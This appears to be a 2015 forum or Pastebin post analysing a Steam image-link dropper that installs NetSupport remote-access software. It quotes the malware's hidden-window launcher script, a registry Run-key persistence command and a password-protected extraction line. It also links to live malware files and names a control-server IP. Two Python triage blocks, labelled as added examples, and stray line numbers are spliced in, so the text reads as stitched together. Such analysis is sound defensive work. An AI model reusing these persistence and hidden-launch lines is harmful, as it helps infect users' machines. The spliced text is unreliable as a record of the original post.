Untitled

a guest
Aug 29th, 2015
**WARNING: Information contained in this post may result in you infecting yourself with a live piece of MOSTLY UNDETECTED malware!**

**Proceed with caution!!!**

If anyone's used Steam a lot, they've inevitably come across a variation of one of those "Click this image link!" things that redirects you to a fake image hosting site and downloads a .scr file.

Well, I got curious one day, so I decided to investigate.

1.) Scan with virustotal.com

[Virustotal Link](https://www.virustotal.com/en/file/808027e47111b52dac9e164713a4a408bb9f5ffcd814b09c57ed9b74bbab3359/analysis/1439847689/)

Currently undetected by everyone excluding 1 Chinese company. That's a little worrying. Must be something new (although it's been around for years), or simply polymorphic (more probably).

2.) Submit to malwr.com

[Analysis Link](https://malwr.com/analysis/MTcwNjEwNTMyYjk2NGRiMzgxZThjMzNhMjZkN2QyODE/)

Two main things to note here.

- Connection to www.myflare.com under "Network Analysis"
- 3 dropped files
3.) Investigation!

Dropped file 1

inst.js

> // Get a WScript.Shell object and launch the two downloaded batch files
> var WSHShell = WScript.CreateObject("WScript.Shell");
> WSHShell.Run('set.cmd', 0); // window style 0 = hidden, so no console appears
> WSHShell.Run('run.cmd', 0);

It runs 2 other files. But where do those come from?
Dropped file 2

down.js

[Pastebin Link](http://pastebin.com/7vAb4rqE) - **WARNING - Those MyFlare files are live - Take caution!**

Ok - That's a little more significant. It downloads 4 files. set.cmd and run.cmd are then run by the first dropped file - inst.js

Let's examine those
runs.exe - Toss it through ProtectionID and we get this - [Picture](http://i.imgur.com/1zd4rIF.png) - It's the 7zip extractor. That small mystery solved.

Next downloaded file - Simply called "file".

Rename it to a .txt, open with Notepad, and the first 3 characters show "7z¼" - Possibly a 7zip archive. Rename the file to .rar, open with WinRAR, and we get...

[Picture](http://i.imgur.com/76p33Cs.png)

The NVidia Display settings in a compressed passworded file? That's weird. Anyways - Carrying on. The next downloaded file!
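The "7z¼" the author sees in Notepad is the start of the 7z signature (bytes 37 7A BC AF 27 1C, with BC rendering as ¼). As an added example, not code from the post, the Python below classifies a dropped file by its leading bytes (7z, RAR, PE) instead of its extension, and decodes the fixed 32-byte 7z signature header with its CRC check so a truncated or corrupted download is caught; the header it runs on is a constructed sample, not the real dropped "file".

```python
import struct
import zlib

# "7z" followed by BC AF 27 1C; the BC byte is the "¼" seen in Notepad.
SEVENZ_MAGIC = b"7z\xbc\xaf\x27\x1c"
MAGICS = {
    SEVENZ_MAGIC: "7z archive",
    b"Rar!\x1a\x07": "RAR archive",
    b"MZ": "PE executable (.exe/.scr/.dll)",
}


def identify(data: bytes) -> str:
    """Classify a file by its leading bytes rather than trusting its extension."""
    for magic, label in MAGICS.items():
        if data.startswith(magic):
            return label
    return "unknown"


def parse_7z_signature_header(data: bytes) -> dict:
    """Validate and decode the 32-byte 7z signature header.

    Layout: magic(6) major(1) minor(1) StartHeaderCRC(4)
            NextHeaderOffset(8) NextHeaderSize(8) NextHeaderCRC(4)
    StartHeaderCRC is CRC32 over the final 20 bytes (offsets 12..31).
    """
    if len(data) < 32 or not data.startswith(SEVENZ_MAGIC):
        raise ValueError("not a 7z archive")
    major, minor, start_crc = struct.unpack_from("<BBI", data, 6)
    if zlib.crc32(data[12:32]) != start_crc:
        raise ValueError("StartHeaderCRC mismatch: truncated or corrupt archive")
    next_off, next_size, next_crc = struct.unpack_from("<QQI", data, 12)
    return {
        "version": f"{major}.{minor}",
        "next_header_offset": next_off,  # relative to the end of this header
        "next_header_size": next_size,
        "next_header_crc": next_crc,
    }


def build_sample_7z_header() -> bytes:
    """Constructed sample (not the real dropped file): a consistent 0.4 header."""
    tail = struct.pack("<QQI", 0x200, 0x40, 0x12345678)
    return SEVENZ_MAGIC + bytes([0, 4]) + struct.pack("<I", zlib.crc32(tail)) + tail


if __name__ == "__main__":
    hdr = build_sample_7z_header()
    print(identify(hdr), parse_7z_signature_header(hdr))
    print(identify(b"MZ\x90\x00"))
```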
  55.  
run.cmd - Open with notepad, and we get

> :: adds a per-user autorun entry (HKCU ...\CurrentVersion\Run) that launches the dropped nvxdsync32.exe at every logon
> reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "nvxdsync32.exe" /t REG_SZ /d "%APPDATA%\Security\nvxdsync32.exe"

Hmmm - So it seems that NVidia driver is more than it appears... But the archive is passworded. Hopefully the final file will shed some light on matters!
set.cmd

[Pastebin Link](http://pastebin.com/1hQMyz7K)

Ok - Wow. This does a lot of stuff. A line that sticks out is

> :: 7-Zip command line: x = extract with full paths, -y = answer yes to all prompts, -o = output folder
> "%APPDATA%\runs.exe" x -pferum -y "%APPDATA%\file" -o"%APPDATA%"

Remember "runs" was the renamed 7zip extractor? Well - What do we have here... "-pferum"? Password of "ferum"? Test, and....

[Picture](http://i.imgur.com/qEFcRWz.png) - It extracted - In a hidden folder!
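The two quoted lines, the Run-key persistence from run.cmd and the password-protected extraction from set.cmd, are exactly what a triage script should pull out of dropped batch files automatically. As an added example that is not the author's code, this Python scans script text for those two patterns and extracts the autorun target, the inline 7-Zip password, the archive and the output folder; its sample input is the two lines quoted above, embedded as a constructed string.

```python
import re
from typing import Dict, List

# Sample input (constructed): the two lines quoted from run.cmd and set.cmd above.
SAMPLE_SCRIPT = r'''
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "nvxdsync32.exe" /t REG_SZ /d "%APPDATA%\Security\nvxdsync32.exe"
"%APPDATA%\runs.exe" x -pferum -y "%APPDATA%\file" -o"%APPDATA%"
'''

# reg add <key ending in \CurrentVersion\Run or \RunOnce> ... /v <name> ... /d <command>
RUN_KEY_RE = re.compile(
    r'^\s*reg\s+add\s+"?(?P<key>[^"]*\\CurrentVersion\\Run(?:Once)?)"?'
    r'.*?/v\s+"?(?P<name>[^"]+)"?.*?/d\s+"?(?P<data>[^"]+)"?',
    re.IGNORECASE,
)
# <tool> x <args>: 7-Zip's "extract with full paths" command
EXTRACT_RE = re.compile(r'^\s*"?(?P<tool>[^"\s]+)"?\s+x\s+(?P<args>.*)$', re.IGNORECASE)
PASSWORD_RE = re.compile(r'(?:^|\s)-p(?P<pw>\S+)')         # -p<password>, attached to the switch
OUTDIR_RE = re.compile(r'(?:^|\s)-o"?(?P<out>[^"\s]+)"?')   # -o<dir> or -o"<dir>"
ARCHIVE_RE = re.compile(r'(?:^|\s)"(?P<arc>[^"]+)"')        # first stand-alone quoted path


def triage_script(text: str) -> List[Dict[str, str]]:
    """One finding per line that sets Run-key persistence or extracts a
    password-protected archive with the password given on the command line."""
    findings: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = RUN_KEY_RE.match(line)
        if m:
            findings.append({"type": "run_key_persistence", "key": m["key"],
                             "value_name": m["name"], "command": m["data"]})
            continue
        m = EXTRACT_RE.match(line)
        if m:
            pw = PASSWORD_RE.search(m["args"])
            if not pw:
                continue  # a plain extraction is not interesting on its own
            out = OUTDIR_RE.search(m["args"])
            arc = ARCHIVE_RE.search(m["args"])
            findings.append({"type": "password_protected_extraction", "tool": m["tool"],
                             "password": pw["pw"], "archive": arc["arc"] if arc else "",
                             "output_dir": out["out"] if out else ""})
    return findings


if __name__ == "__main__":
    for finding in triage_script(SAMPLE_SCRIPT):
        print(finding)
```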
  73.  
Open it, and... [Picture](http://i.imgur.com/7ORcF8a.png)

...

So where are the rest of the files?

Well, it seems that set.cmd also plays around with folder permissions a bit... So let's try to find them!

[Picture](http://i.imgur.com/EbS8q0n.png) - Yup - There they are!

After a bit of fiddling around - GOT THEM! -
[Picture](http://i.imgur.com/WzAWfYg.png)

So - What's so special about that NVidia config file now...? Right-click Properties, and.... That doesn't look right! - [Picture](http://i.imgur.com/C2i3r0s.png)

Do a bit of research on Net Support, and we figure out that it's a piece of Remote Desktop software. Who would've thought!

4.) The End

Now, this is unfortunately where my little adventure ends. For you see, whilst I was able to acquire a trial version of the Net Support software (it's a legitimate piece of software), I was unable to connect to his server, as I was unable to decipher the Gateway key he used.

[Config file - Picture](http://i.imgur.com/Jg0YblC.png) (Well well Mr Dew of Germany...)

[Vague decryption attempts - Picture](http://i.imgur.com/hrLiZII.png) - I could input characters and get an encrypted output. I had the output I needed, although I couldn't figure out the input. This is a sample of the input / output.

Unfortunately my Cryptography skills are insufficient, so here the story ends. I am simply one powerless individual, so I am unable to do anything about tracking down the server IP - 46.165.206.78 - Currently online as of posting.

I hope you had a good read, maybe learned something, and enjoy the rest of your day!

**UPDATE**

rachaelmac from MyFlare support contacted me, and claimed the files in down.js were removed. They were not.